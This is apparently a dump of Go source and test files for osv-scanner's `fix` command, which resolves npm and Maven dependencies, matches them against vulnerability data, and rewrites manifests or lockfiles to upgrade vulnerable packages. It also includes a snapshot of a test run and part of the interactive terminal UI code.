[TestCommand_OfflineDatabase/fix_non_interactive_relax_package_json_with_offline_vulns - 1] Loaded npm local db from /osv-scanner/npm/all.zip Resolving /package.json... Found 7 vulnerabilities matching the filter Can fix 3/7 matching vulnerabilities by changing 1 dependencies UPGRADED-PACKAGE: npm-registry-client,6.2.0,^7.5.0 FIXED-VULN-IDS: GHSA-43f8-2h32-f4cj,GHSA-c2qf-rxjj-qqgw,GHSA-c6rq-rjc2-86v2 REMAINING-VULNS: 4 UNFIXABLE-VULNS: 4 Rewriting /package.json... --- [TestCommand_OfflineDatabase/fix_non_interactive_relax_package_json_with_offline_vulns - 2] --- [TestCommand_OfflineDatabase/fix_non_interactive_relax_package_json_with_offline_vulns - 3] { "name": "osv-fix", "version": "1.0.0", "description": "", "main": "index.js", "scripts": { "test": "echo /"Error: no test specified/" && exit 1" }, "author": "", "license": "ISC", "dependencies": { "npm-registry-client": "^7.5.0" } } --- ================================================ FILE: cmd/osv-scanner/fix/command.go ================================================ // Package fix implements the `fix` command for osv-scanner. // It scans a manifest and/or lockfile for vulnerabilities and suggests changes for remediating them. 
package fix

import (
	"context"
	"errors"
	"fmt"
	"io"
	"net/http"
	"os"
	"path/filepath"
	"strings"
	"time"

	"deps.dev/util/resolve"
	"github.com/google/osv-scalibr/inventory/osvecosystem"
	"github.com/google/osv-scanner/v2/internal/clients/clientimpl/localmatcher"
	"github.com/google/osv-scanner/v2/internal/clients/clientimpl/osvmatcher"
	"github.com/google/osv-scanner/v2/internal/cmdlogger"
	"github.com/google/osv-scanner/v2/internal/depsdev"
	"github.com/google/osv-scanner/v2/internal/remediation"
	"github.com/google/osv-scanner/v2/internal/remediation/upgrade"
	"github.com/google/osv-scanner/v2/internal/resolution"
	"github.com/google/osv-scanner/v2/internal/resolution/client"
	"github.com/google/osv-scanner/v2/internal/resolution/lockfile"
	"github.com/google/osv-scanner/v2/internal/resolution/manifest"
	"github.com/google/osv-scanner/v2/internal/resolution/util"
	"github.com/google/osv-scanner/v2/internal/version"
	"github.com/urfave/cli/v3"
	"golang.org/x/term"
	"osv.dev/bindings/go/osvdev"
)

// strategy names a remediation approach selectable with the --strategy flag.
type strategy string

const (
	strategyInPlace  strategy = "in-place"
	strategyRelax    strategy = "relax"
	strategyOverride strategy = "override"
)

// strategies lists the accepted --strategy values; it is used to build the
// flag's usage text and the "unsupported strategy" error message.
var strategies = []string{string(strategyInPlace), string(strategyRelax), string(strategyOverride)}

// Category headings under which the flags below are grouped.
const (
	vulnCategory     = "Vulnerability Selection Options:"
	upgradeCategory  = "Dependency Upgrade Options:"
	autoModeCategory = "non-interactive options:" // intentionally lowercase to force it to sort after the other categories
)

// osvFixOptions is the parsed command-line state that action hands to the
// interactive and non-interactive remediation paths.
type osvFixOptions struct {
	remediation.Options

	Client      client.ResolutionClient // dependency client and vulnerability matcher, both filled in by action
	Manifest    string                  // value of --manifest; empty when the flag was not given
	ManifestRW  manifest.ReadWriter     // reader/writer chosen for Manifest; only set when Manifest is non-empty
	Lockfile    string                  // value of --lockfile; empty when the flag was not given
	LockfileRW  lockfile.ReadWriter     // reader/writer chosen for Lockfile; only set when Lockfile is non-empty
	NoIntroduce bool                    // value of --no-introduce
	OutputJSON  bool                    // true when --format is "json"
	Stdout      io.Writer
	Stderr      io.Writer
}

// Command builds the `fix` sub-command: its flags, the per-flag validation
// callbacks, and an Action that forwards to action with the given writers.
// The *http.Client parameter is accepted but not used.
func Command(stdout, stderr io.Writer, _ *http.Client) *cli.Command {
	return &cli.Command{
		Name:        "fix",
		Usage:       "scans a manifest and/or lockfile for vulnerabilities and suggests changes for remediating them",
		Description: "scans a manifest and/or lockfile for vulnerabilities and suggests changes for remediating them",
		Flags: []cli.Flag{
			&cli.StringFlag{
				Name:      "manifest",
				Aliases:   []string{"M"},
				Usage:     "manifest file to remediate vulnerabilities in",
				TakesFile: true,
			},
			&cli.StringFlag{
				Name:      "lockfile",
				Aliases:   []string{"L"},
				Usage:     "lockfile to remediate vulnerabilities in",
				TakesFile: true,
			},
			&cli.StringFlag{
				Name:  "data-source",
				Usage: "source to fetch package information from; value can be: deps.dev, native",
				Value: "deps.dev",
				// Only the two literal values are accepted; anything else is rejected at parse time.
				Action: func(_ context.Context, _ *cli.Command, s string) error {
					if s != "deps.dev" && s != "native" {
						return fmt.Errorf("unsupported data-source \"%s\" - must be one of: deps.dev, native", s)
					}

					return nil
				},
			},
			// NOTE(review): this value is passed unchanged to manifest.GetReadWriter and,
			// with the native data source, to client.NewMavenRegistryClient; no validation
			// of the URL (scheme, host) is visible in this file - confirm the callees check it.
			&cli.StringFlag{
				Name:  "maven-registry",
				Usage: "URL of the default Maven registry to fetch metadata",
			},
			&cli.BoolFlag{
				Name:   "non-interactive",
				Usage:  "[DEPRECATED] run in the non-interactive mode",
				Hidden: true,
				Value:  true,
			},
			&cli.BoolFlag{
				Name:  "interactive",
				Usage: "run in the interactive mode",
				// Interactive mode is refused unless stdin is a terminal.
				Action: func(_ context.Context, _ *cli.Command, b bool) error {
					if b && !term.IsTerminal(int(os.Stdin.Fd())) {
						return errors.New("interactive mode only to be run in a terminal")
					}

					return nil
				},
			},
			&cli.StringFlag{
				Name:    "format",
				Aliases: []string{"f"},
				Usage:   "sets the non-interactive output format; value can be: text, json",
				Value:   "text",
				Action: func(_ context.Context, _ *cli.Command, s string) error {
					if s == "text" || s == "json" {
						if s == "json" {
							// Presumably keeps stdout free for the JSON document - confirm in cmdlogger.
							cmdlogger.SendEverythingToStderr()
						}

						return nil
					}

					return fmt.Errorf("unsupported output format \"%s\" - must be one of: text, json", s)
				},
			},
			&cli.StringFlag{
				Category: autoModeCategory,
				Name:     "strategy",
				Usage:    "remediation approach to use; value can be: " + strings.Join(strategies, ", "),
				// Rejects unknown strategies and checks that the file each strategy
				// rewrites (lockfile for in-place, manifest for relax/override) was given.
				Action: func(_ context.Context, cmd *cli.Command, s string) error {
					switch strategy(s) {
					case strategyInPlace:
						if !cmd.IsSet("lockfile") {
							return fmt.Errorf("%s strategy requires lockfile", strategyInPlace)
						}
					case strategy("relock"): // renamed
						fallthrough
					case strategyRelax:
						if !cmd.IsSet("manifest") {
							return fmt.Errorf("%s strategy requires manifest file", strategyRelax)
						}
					case strategyOverride:
						if !cmd.IsSet("manifest") {
							return fmt.Errorf("%s strategy requires manifest file", strategyOverride)
						}
					default:
						return fmt.Errorf("unsupported strategy \"%s\" - must be one of: %s", s, strings.Join(strategies, ", "))
					}

					return nil
				},
			},
			&cli.IntFlag{
				Category: autoModeCategory,
				Name:     "apply-top",
				Usage:    "apply the top N patches",
				Value:    -1,
			},
			&cli.BoolFlag{
				Category: autoModeCategory,
				Name:     "no-introduce",
				Usage:    "exclude patches that would introduce new vulnerabilities",
			},
			&cli.StringSliceFlag{
				Category:    upgradeCategory,
				Name:        "upgrade-config",
				Usage:       "the allowed package upgrades, in the format `[package-name:]level`. If package-name is omitted, level is applied to all packages. level must be one of (major, minor, patch, none).",
				DefaultText: "major",
			},
			&cli.IntFlag{
				Category: vulnCategory,
				Name:     "max-depth",
				Usage:    "maximum dependency depth of vulnerabilities to consider",
				Value:    -1,
			},
			&cli.Float64Flag{
				Category:    vulnCategory,
				Name:        "min-severity",
				Usage:       "minimum CVSS score of vulnerabilities to consider",
				Value:       0,
				DefaultText: "0.0",
			},
			&cli.StringSliceFlag{
				Category: vulnCategory,
				Name:     "vulns",
				Usage:    "explicit list of vulnerability IDs to consider",
			},
			&cli.StringSliceFlag{
				Category: vulnCategory,
				Name:     "ignore-vulns",
				Usage:    "list of vulnerability IDs to ignore",
			},
			&cli.BoolFlag{
				Category: vulnCategory,
				Name:     "ignore-dev",
				Usage:    "ignore vulnerabilities affecting only development dependencies",
			},
			&cli.BoolFlag{
				Category: vulnCategory,
				Name:     "maven-fix-management",
				Usage:    "(pom.xml) also remediate vulnerabilities in dependencyManagement packages that do not appear in the resolved dependency graph",
			},

			// Offline database flags, copied from osv-scanner scan
			&cli.BoolFlag{
				Name:    "offline-vulnerabilities",
				Aliases: []string{"offline"},
				Usage:   "checks for vulnerabilities using local databases that are already cached",
			},
			&cli.BoolFlag{
				Name:  "download-offline-databases",
				Usage: "downloads vulnerability databases for offline comparison",
			},
			&cli.StringFlag{
				Name:   "local-db-path",
				Usage:  "sets the path that local databases should be stored",
				Hidden: true,
			},
		},
		Action: func(ctx context.Context, cmd *cli.Command) error {
			return action(ctx, cmd, stdout, stderr)
		},
	}
}

// action runs the `fix` command: it turns the parsed flags into an
// osvFixOptions, selects the dependency client and vulnerability matcher, and
// then dispatches to interactive mode or to one of the non-interactive
// strategies. The non-interactive strategies rewrite the given manifest or
// lockfile on disk (see noninteractive.go).
func action(ctx context.Context, cmd *cli.Command, stdout, stderr io.Writer) error {
	if !cmd.IsSet("manifest") && !cmd.IsSet("lockfile") {
		return errors.New("manifest or lockfile is required")
	}

	opts := osvFixOptions{
		Options: remediation.Options{
			ResolveOpts: resolution.ResolveOpts{
				MavenManagement: cmd.Bool("maven-fix-management"),
			},
			IgnoreVulns:   cmd.StringSlice("ignore-vulns"),
			ExplicitVulns: cmd.StringSlice("vulns"),
			DevDeps:       !cmd.Bool("ignore-dev"),
			MinSeverity:   cmd.Float64("min-severity"),
			MaxDepth:      cmd.Int("max-depth"),
			UpgradeConfig: upgrade.ParseUpgradeConfig(cmd.StringSlice("upgrade-config")),
		},
		Manifest:    cmd.String("manifest"),
		Lockfile:    cmd.String("lockfile"),
		NoIntroduce: cmd.Bool("no-introduce"),
		OutputJSON:  cmd.String("format") == "json",
		Stdout:      stdout,
		Stderr:      stderr,
	}

	system := resolve.UnknownSystem
	if opts.Lockfile != "" {
		rw, err := lockfile.GetReadWriter(opts.Lockfile)
		if err != nil {
			return err
		}
		opts.LockfileRW = rw
		system = rw.System()
	}

	if opts.Manifest != "" {
		rw, err := manifest.GetReadWriter(opts.Manifest, cmd.String("maven-registry"))
		if err != nil {
			return err
		}
		opts.ManifestRW = rw
		// Prefer the manifest's system over the lockfile's.
		// TODO: make sure they match
		// NOTE(review): when both files are given, the lockfile's system is overwritten
		// here without being compared, so a manifest/lockfile pair from different
		// ecosystems is not rejected; the client and the offline database below are
		// then chosen from the manifest's system alone.
		system = rw.System()
	}

	// Select where package/version metadata is fetched from.
	switch cmd.String("data-source") {
	case "deps.dev":
		cl, err := client.NewDepsDevClient(depsdev.DepsdevAPI, "osv-scanner_fix/"+version.OSVVersion)
		if err != nil {
			return err
		}
		opts.Client.DependencyClient = cl
	case "native":
		switch system {
		case resolve.NPM:
			var workDir string
			// Prefer to use the manifest's directory if available.
			if opts.Manifest != "" {
				workDir = filepath.Dir(opts.Manifest)
			} else {
				workDir = filepath.Dir(opts.Lockfile)
			}
			// NOTE(review): the project directory is handed to the npm registry client;
			// presumably project-local npm configuration is read from it - confirm what
			// is loaded and trusted from a scanned project's directory.
			cl, err := client.NewNpmRegistryClient(workDir)
			if err != nil {
				return err
			}
			opts.Client.DependencyClient = cl
		case resolve.Maven:
			cl, err := client.NewMavenRegistryClient(cmd.String("maven-registry"))
			if err != nil {
				return err
			}
			opts.Client.DependencyClient = cl
		case resolve.UnknownSystem:
			fallthrough
		default:
			return fmt.Errorf("native data-source currently unsupported for %s ecosystem", system.String())
		}
	}

	// Select the vulnerability source: a local database or the OSV API.
	userAgent := "osv-scanner_fix/" + version.OSVVersion
	if cmd.Bool("offline-vulnerabilities") {
		matcher, err := localmatcher.NewLocalMatcher(
			cmd.String("local-db-path"),
			userAgent,
			cmd.Bool("download-offline-databases"),
		)
		if err != nil {
			return err
		}

		eco, ok := util.OSVEcosystem[system]
		if !ok {
			// Something's very wrong if we hit this
			panic("unhandled resolve.Ecosystem: " + system.String())
		}
		if err := matcher.LoadEcosystem(ctx, osvecosystem.Parsed{Ecosystem: eco}); err != nil {
			return err
		}

		opts.Client.VulnerabilityMatcher = matcher
	} else {
		config := osvdev.DefaultConfig()
		config.UserAgent = userAgent
		// NOTE(review): http.DefaultClient carries no client-level Timeout, and the
		// *http.Client passed to Command is not used here; what InitialQueryTimeout
		// bounds is defined in osvmatcher - confirm later queries are also bounded.
		opts.Client.VulnerabilityMatcher = &osvmatcher.CachedOSVMatcher{
			Client: osvdev.OSVClient{
				HTTPClient:  http.DefaultClient,
				Config:      config,
				BaseHostURL: osvdev.DefaultBaseURL,
			},
			InitialQueryTimeout: 5 * time.Minute,
		}
	}

	if cmd.Bool("interactive") {
		return interactiveMode(ctx, opts)
	}

	maxUpgrades := cmd.Int("apply-top")

	// From here on the local variable shadows the strategy type.
	strategy := strategy(cmd.String("strategy"))
	if strategy == "relock" { // renamed
		strategy = strategyRelax
	}

	if !cmd.IsSet("strategy") {
		// Choose a default strategy based on the manifest/lockfile provided.
		switch {
		case remediation.SupportsRelax(opts.ManifestRW):
			strategy = strategyRelax
		case remediation.SupportsOverride(opts.ManifestRW):
			strategy = strategyOverride
		case remediation.SupportsInPlace(opts.LockfileRW):
			strategy = strategyInPlace
		default:
			return errors.New("no supported remediation strategies for manifest/lockfile")
		}
	}

	switch strategy {
	case strategyRelax:
		return autoRelax(ctx, opts, maxUpgrades)
	case strategyInPlace:
		return autoInPlace(ctx, opts, maxUpgrades)
	case strategyOverride:
		return autoOverride(ctx, opts, maxUpgrades)
	default:
		// The strategy flag should already be validated by this point.
		panic(fmt.Sprintf("non-interactive mode attempted to run with unhandled strategy: \"%s\"", cmd.String("strategy")))
	}
}

================================================
FILE: cmd/osv-scanner/fix/command_test.go
================================================
package fix_test

import (
	"context"
	"os"
	"slices"
	"testing"

	"github.com/google/osv-scanner/v2/cmd/osv-scanner/fix"
	"github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/testcmd"
	"github.com/google/osv-scanner/v2/internal/remediation/upgrade"
	"github.com/google/osv-scanner/v2/internal/testutility"
	"github.com/urfave/cli/v3"
)

// matchFile reads file and matches its contents against the test's snapshot,
// failing the test if the file cannot be read.
func matchFile(t *testing.T, file string) {
	t.Helper()
	b, err := os.ReadFile(file)
	if err != nil {
		t.Fatalf("could not read test file: %v", err)
	}
	testutility.NewSnapshot().WithCRLFReplacement().MatchText(t, string(b))
}

// TestCommand runs the `fix` command over the fixture manifests/lockfiles and
// snapshot-matches both the command output and the rewritten file. The error
// cases cover the flag validation in Command and expect exit code 127.
func TestCommand(t *testing.T) {
	t.Parallel()

	testutility.SkipIfShort(t)

	tests := []testcmd.Case{
		{
			Name: "no_args_provided",
			Args: []string{"", "fix"},
			Exit: 127,
		},
		{
			Name: "fix_non-interactive_in-place_package-lock.json",
			Args: []string{"", "fix", "--strategy=in-place", "-L", "./testdata/in-place-npm/package-lock.json"},
			Exit: 0,
		},
		{
			Name: "fix_non_interactive_in_place_package_lock_json_with_native_data_source",
			Args: []string{"", "fix", "--strategy=in-place", "--data-source", "native", "-L", "./testdata/in-place-npm/package-lock.json"},
			Exit: 0,
		},
		{
			Name: "fix_non-interactive_relax_package.json",
			Args: []string{"", "fix", "--strategy=relax", "-M", "./testdata/relax-npm/package.json"},
			Exit: 0,
		},
		{
			Name: "fix_non-interactive_override_pom.xml",
			Args: []string{"", "fix", "--strategy=override", "-M", "./testdata/override-maven/pom.xml"},
			Exit: 0,
		},
		{
			Name: "fix_non_interactive_override_pom_xml_with_native_data_source",
			Args: []string{"", "fix", "--strategy=override", "--data-source", "native", "-M", "./testdata/override-maven/pom.xml"},
			Exit: 0,
		},
		{
			Name: "fix_non-interactive_json_in-place_package-lock.json",
			Args: []string{"", "fix", "--strategy=in-place", "--format=json", "-L", "./testdata/in-place-npm/package-lock.json"},
			Exit: 0,
		},
		{
			Name: "fix_non-interactive_json_relax_package.json",
			Args: []string{"", "fix", "--strategy=relax", "--format=json", "-M", "./testdata/relax-npm/package.json"},
			Exit: 0,
		},
		{
			Name: "fix_non-interactive_json_override_pom.xml",
			Args: []string{"", "fix", "--strategy=override", "--format=json", "-M", "./testdata/override-maven/pom.xml"},
			Exit: 0,
		},
		{
			Name: "errors_with_invalid_data_source",
			Args: []string{"", "fix", "--data-source=github"},
			Exit: 127,
		},
		{
			Name: "errors_with_unsupported_format",
			Args: []string{"", "fix", "--format=yaml"},
			Exit: 127,
		},
		{
			Name: "errors_with_unsupported_strategy",
			Args: []string{"", "fix", "--strategy=force"},
			Exit: 127,
		},
		{
			Name: "errors_when_in_place_used_without_lockfile",
			Args: []string{"", "fix", "--strategy=in-place", "-M", "./testdata/relax-npm/package.json"},
			Exit: 127,
		},
		{
			Name: "errors_when_relock_used_without_manifest",
			Args: []string{"", "fix", "--strategy=relock", "-L", "./testdata/in-place-npm/package-lock.json"},
			Exit: 127,
		},
		{
			Name: "errors_when_relax_used_without_manifest",
			Args: []string{"", "fix", "--strategy=relax", "-L", "./testdata/in-place-npm/package-lock.json"},
			Exit: 127,
		},
		{
			Name: "errors_when_override_used_without_manifest",
			Args: []string{"", "fix", "--strategy=override", "-L", "./testdata/in-place-npm/package-lock.json"},
			Exit: 127,
		},
	}

	for _, tt := range tests {
		t.Run(tt.Name, func(t *testing.T) {
			t.Parallel()

			// fix action overwrites files, copy them to a temporary directory
			testDir := testutility.CreateTestDir(t)

			lockfile := testcmd.CopyFileFlagTo(t, tt, "-L", testDir)
			manifest := testcmd.CopyFileFlagTo(t, tt, "-M", testDir)

			testcmd.RunAndMatchSnapshots(t, tt)

			if lockfile != "" {
				matchFile(t, lockfile)
			}
			if manifest != "" {
				matchFile(t, manifest)
			}
		})
	}
}

// TestCommand_OfflineDatabase repeats the in-place and relax runs with
// --offline-vulnerabilities and --download-offline-databases set.
func TestCommand_OfflineDatabase(t *testing.T) {
	t.Parallel()

	testutility.SkipIfShort(t)

	tests := []testcmd.Case{
		{
			Name: "fix_non_interactive_in_place_package_lock_json_with_offline_vulns",
			Args: []string{"", "fix", "--strategy=in-place", "--offline-vulnerabilities", "--download-offline-databases", "-L", "./testdata/in-place-npm/package-lock.json"},
			Exit: 0,
		},
		{
			Name: "fix_non_interactive_relax_package_json_with_offline_vulns",
			Args: []string{"", "fix", "--strategy=relax", "--offline-vulnerabilities", "--download-offline-databases", "-M", "./testdata/relax-npm/package.json"},
			Exit: 0,
		},
	}

	for _, tt := range tests {
		t.Run(tt.Name, func(t *testing.T) {
			t.Parallel()

			// fix action overwrites files, copy them to a temporary directory
			testDir := testutility.CreateTestDir(t)

			lockfile := testcmd.CopyFileFlagTo(t, tt, "-L", testDir)
			manifest := testcmd.CopyFileFlagTo(t, tt, "-M", testDir)

			testcmd.RunAndMatchSnapshots(t, tt)

			if lockfile != "" {
				matchFile(t, lockfile)
			}
			if manifest != "" {
				matchFile(t, manifest)
			}
		})
	}
}

// parseFlags parses arguments against the subset of the fix command's flags
// named in flags and returns the resulting *cli.Command with the parse error.
func parseFlags(t *testing.T, flags []string, arguments []string) (*cli.Command, error) {
	// This is a bit hacky: make a mock App with only the flags we care about.
	// Then use app.RunAndMatchSnapshots() to parse the flags into the cli.Context, which is returned.
	t.Helper()
	appFlags := make([]cli.Flag, 0, len(flags))
	for _, f := range fix.Command(nil, nil, nil).Flags {
		if slices.ContainsFunc(f.Names(), func(s string) bool { return slices.Contains(flags, s) }) {
			appFlags = append(appFlags, f)
		}
	}
	var parsedCmd *cli.Command
	app := cli.Command{
		Flags: appFlags,
		Action: func(_ context.Context, cmd *cli.Command) error {
			t.Helper()
			// Capture the parsed command instead of running anything.
			parsedCmd = cmd

			return nil
		},
	}
	err := app.Run(t.Context(), append([]string{""}, arguments...))

	return parsedCmd, err
}

// Test_parseUpgradeConfig checks the upgrade level returned per package name
// for several --upgrade-config combinations, including package names that
// themselves contain colons.
func Test_parseUpgradeConfig(t *testing.T) {
	t.Parallel()

	flags := []string{"upgrade-config"}

	tests := []struct {
		name string
		args []string
		want map[string]upgrade.Level
	}{
		{
			name: "default_behaviour",
			args: []string{},
			want: map[string]upgrade.Level{
				"foo": upgrade.Major,
				"bar": upgrade.Major,
			},
		},
		{
			name: "general_level_config",
			args: []string{"--upgrade-config=minor"},
			want: map[string]upgrade.Level{
				"foo": upgrade.Minor,
				"bar": upgrade.Minor,
			},
		},
		{
			name: "all_levels",
			args: []string{
				"--upgrade-config", "major:major",
				"--upgrade-config", "minor:minor",
				"--upgrade-config", "patch:patch",
				"--upgrade-config", "none:none",
			},
			want: map[string]upgrade.Level{
				"major": upgrade.Major,
				"minor": upgrade.Minor,
				"patch": upgrade.Patch,
				"none":  upgrade.None,
				"other": upgrade.Major,
			},
		},
		{
			name: "package_takes_precedence_over_general",
			args: []string{
				"--upgrade-config", "pkg1:minor",
				"--upgrade-config", "none",
				"--upgrade-config", "pkg2:major",
			},
			want: map[string]upgrade.Level{
				"pkg1": upgrade.Minor,
				"pkg2": upgrade.Major,
				"pkg3": upgrade.None,
			},
		},
		{
			name: "package_names_with_colons",
			args: []string{
				"--upgrade-config=none:patch:minor:major",
				"--upgrade-config=none:patch:minor",
				"--upgrade-config=none:patch",
				"--upgrade-config=none",
			},
			want: map[string]upgrade.Level{
				"none:patch:minor": upgrade.Major,
				"none:patch":       upgrade.Minor,
				"none":             upgrade.Patch,
				"other":            upgrade.None,
			},
		},
	}
	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
			t.Parallel()
			cmd, err := parseFlags(t, flags, tt.args)
			if err != nil {
				t.Fatalf("error parsing flags: %v", err)
			}
			config := upgrade.ParseUpgradeConfig(cmd.StringSlice("upgrade-config"))
			for pkg, want := range tt.want {
				if got := config.Get(pkg); got != want {
					t.Errorf("Config.Get(%s) got = %v, want %v", pkg, got, want)
				}
			}
		})
	}
}

================================================
FILE: cmd/osv-scanner/fix/interactive.go
================================================
package fix

import (
	"context"
	"errors"

	tea "charm.land/bubbletea/v2"
	"github.com/google/osv-scanner/v2/internal/remediation"
)

// TODO: currently, it's impossible to undo commands
// Need to think about how to support this

// interactiveMode runs the terminal UI for `fix`. It refuses to start unless
// the relax strategy is supported for the manifest or the in-place strategy
// for the lockfile; the override strategy is not available interactively.
func interactiveMode(ctx context.Context, opts osvFixOptions) error {
	if !remediation.SupportsRelax(opts.ManifestRW) && !remediation.SupportsInPlace(opts.LockfileRW) {
		if remediation.SupportsOverride(opts.ManifestRW) {
			return errors.New("override strategy is not supported in interactive mode")
		}

		return errors.New("no supported remediation strategies found")
	}

	cl := opts.Client

	p := tea.NewProgram(newModel(ctx, opts, cl))
	m, err := p.Run()
	if err != nil {
		return err
	}

	// It doesn't look like it's possible to make p.Run() return a custom error,
	// so we store fatal errors on the model itself.
return m.(model).err
}

================================================
FILE: cmd/osv-scanner/fix/model.go
================================================
package fix

import (
	"context"
	"fmt"
	"os"
	"strings"

	"charm.land/bubbles/v2/help"
	"charm.land/bubbles/v2/key"
	tea "charm.land/bubbletea/v2"
	"charm.land/lipgloss/v2"
	"deps.dev/util/resolve"
	"github.com/google/osv-scanner/v2/internal/remediation"
	"github.com/google/osv-scanner/v2/internal/resolution"
	"github.com/google/osv-scanner/v2/internal/resolution/client"
	"github.com/google/osv-scanner/v2/internal/resolution/depfile"
	manif "github.com/google/osv-scanner/v2/internal/resolution/manifest"
	"github.com/google/osv-scanner/v2/internal/tui"
	"golang.org/x/term"
)

// model is the top-level state of the interactive `fix` UI: the command-line
// options, the resolution client, the view geometry, and the current
// modelState to which Init, Update and View delegate.
//
//nolint:recvcheck
type model struct {
	//nolint:containedctx
	ctx           context.Context         // Context, mostly used in deps.dev functions
	options       osvFixOptions           // options, from command line
	cl            client.ResolutionClient // graph client used for deps.dev functions
	lockfileGraph *resolve.Graph

	termWidth  int // width of the whole terminal
	termHeight int // height of the whole terminal

	mainViewWidth  int            // width of the main view
	mainViewHeight int            // height of the main view
	mainViewStyle  lipgloss.Style // border style to render the main view

	infoViewWidth  int            // width of the secondary info view
	infoViewHeight int            // height of the info view
	infoViewStyle  lipgloss.Style // border style to render the info view

	help help.Model // help text renderer

	st  modelState // current state of program
	err error      // set if a fatal error occurs within the program

	writing bool // whether the model is currently shelling out writing lockfile/manifest file

	inPlaceResult     *remediation.InPlaceResult // results & patches from minimal / in-place resolution
	relockBaseRes     *resolution.Result         // Base relock result, matching the current manifest on disk
	relockBaseResErrs []resolution.NodeError     // Errors in base relock result
}

// newModel builds the initial model in the stateInitialize state and sizes
// its views from the current terminal dimensions.
func newModel(ctx context.Context, opts osvFixOptions, cl client.ResolutionClient) model {
	mainViewStyle := lipgloss.NewStyle().
		BorderStyle(lipgloss.RoundedBorder()).
		Padding(tui.ViewVPad, tui.ViewHPad)

	infoViewStyle := lipgloss.NewStyle().
		BorderStyle(lipgloss.RoundedBorder()).
		Padding(tui.ViewVPad, tui.ViewHPad)

	m := model{
		ctx:           ctx,
		options:       opts,
		cl:            cl,
		st:            &stateInitialize{},
		mainViewStyle: mainViewStyle,
		infoViewStyle: infoViewStyle,
		help:          help.New(),
	}

	// NOTE(review): the size is read from stdout and any failure panics, while the
	// --interactive flag check in command.go only tests that stdin is a terminal;
	// with stdout redirected this would likely panic instead of returning an error.
	w, h, err := term.GetSize(int(os.Stdout.Fd()))
	if err != nil {
		panic(err)
	}
	m.setTermSize(w, h)

	return m
}

// setTermSize records the terminal size, recomputes the main and info view
// dimensions from it, and resizes the current state's views to match.
func (m *model) setTermSize(w, h int) {
	m.termWidth = w
	m.termHeight = h

	// The internal rendering space of the views occupy a percentage of the terminal width
	viewWidth := max(int(float64(w)*tui.ViewWidthPct), tui.ViewMinWidth)
	// The internal height is constant
	viewHeight := tui.ViewMinHeight

	// The total width/height, including the whitespace padding and border characters on each side
	paddedWidth := viewWidth + 2*tui.ViewHPad + 2
	paddedHeight := viewHeight + 2*tui.ViewVPad + 2

	// resize the views to the calculated dimensions
	m.mainViewWidth = viewWidth
	m.mainViewHeight = viewHeight
	m.mainViewStyle = m.mainViewStyle.Width(paddedWidth).Height(paddedHeight)

	m.infoViewWidth = viewWidth
	m.infoViewHeight = viewHeight
	m.infoViewStyle = m.infoViewStyle.Width(paddedWidth).Height(paddedHeight)

	m.st.Resize(m.mainViewWidth, m.mainViewHeight)
	m.st.ResizeInfo(m.infoViewWidth, m.infoViewHeight)
}

// getBorderStyles returns the main and info view styles, in that order, after
// colouring the border of whichever view is not focused with tui.ColorDisabled.
func (m *model) getBorderStyles() (lipgloss.Style, lipgloss.Style) {
	if m.st.IsInfoFocused() {
		m.infoViewStyle = m.infoViewStyle.UnsetBorderForeground()
		m.mainViewStyle = m.mainViewStyle.BorderForeground(tui.ColorDisabled)
	} else {
		m.infoViewStyle = m.infoViewStyle.BorderForeground(tui.ColorDisabled)
		m.mainViewStyle = m.mainViewStyle.UnsetBorderForeground()
	}

	return m.mainViewStyle, m.infoViewStyle
}

// errorAndExit stores err on the model and returns it together with tea.Quit.
// interactiveMode reads the stored error back after the program has run.
//
// TODO: Handle all errors better, instead of just quitting on any error
func errorAndExit(m model, err error) (tea.Model, tea.Cmd) {
	m.err = err
	return m, tea.Quit
}

// Init delegates to the current state's Init.
func (m model) Init() tea.Cmd {
	return m.st.Init(m)
}

// Update handles the global key bindings and window resizes, then forwards the
// message to the current state.
func (m model) Update(msg tea.Msg) (tea.Model, tea.Cmd) {
	switch msg := msg.(type) {
	case tea.KeyPressMsg:
		switch {
		case msg.String() == "ctrl+c": // always quit on ctrl+c
			return m, tea.Quit
		case key.Matches(msg, tui.Keys.Help): // toggle help
			m.help.ShowAll = !m.help.ShowAll
		}
	case tea.WindowSizeMsg:
		m.setTermSize(msg.Width, msg.Height)
	}

	return m.st.Update(m, msg)
}

// View renders the main and info views with the help text underneath, centred
// in the terminal, and requests the alternate screen.
func (m model) View() tea.View {
	// render both views side-by-side
	mainStyle, infoStyle := m.getBorderStyles()
	mainView := mainStyle.Render(m.st.View(m))
	infoView := infoStyle.Render(m.st.InfoView())
	view := lipgloss.JoinHorizontal(lipgloss.Top, mainView, infoView)

	// If we can't fit both side-by-side, only render the focused view
	if lipgloss.Width(view) > m.termWidth {
		if m.st.IsInfoFocused() {
			view = infoView
		} else {
			view = mainView
		}
	}

	// add the help to the bottom
	view = lipgloss.JoinVertical(lipgloss.Center, view, m.help.View(tui.Keys))

	v := tea.NewView(lipgloss.Place(m.termWidth, m.termHeight, lipgloss.Center, lipgloss.Center, view))
	v.AltScreen = true

	return v
}

// modelState is one screen of the interactive UI. The model forwards Init,
// Update and View to the current state and asks it to resize and render its
// main and info views.
type modelState interface {
	Init(m model) tea.Cmd
	Update(m model, msg tea.Msg) (tea.Model, tea.Cmd)
	View(m model) string
	Resize(w, h int)

	InfoView() string
	ResizeInfo(w, h int)
	IsInfoFocused() bool
}

// inPlaceResolutionMsg is the message returned by doInPlaceResolution: the
// computed in-place result, the graph read from the lockfile, and any error.
type inPlaceResolutionMsg struct {
	res remediation.InPlaceResult
	g   *resolve.Graph
	err error
}

// doInPlaceResolution opens and reads the lockfile named in opts, computes the
// in-place patches for its graph, and returns everything as an
// inPlaceResolutionMsg. Open and read failures are returned in the message's
// err field.
func doInPlaceResolution(ctx context.Context, cl client.ResolutionClient, opts osvFixOptions) tea.Msg {
	lf, err := depfile.OpenLocalDepFile(opts.Lockfile)
	if err != nil {
		return inPlaceResolutionMsg{err: err}
	}
	defer lf.Close()

	g, err := opts.LockfileRW.Read(lf)
	if err != nil {
		return inPlaceResolutionMsg{err: err}
	}

	res, err := remediation.ComputeInPlacePatches(ctx, cl, g, opts.Options)

	return inPlaceResolutionMsg{res, g, err}
}

// doRelockMsg is the message returned by doRelock and doInitialRelock.
type doRelockMsg struct {
	res *resolution.Result
	err error
}

// doRelock resolves the manifest m, writes the client's cache for the
// manifest's path, and filters the resolved vulnerabilities with matchFn. A
// resolution or cache-write failure is returned in the message with a nil result.
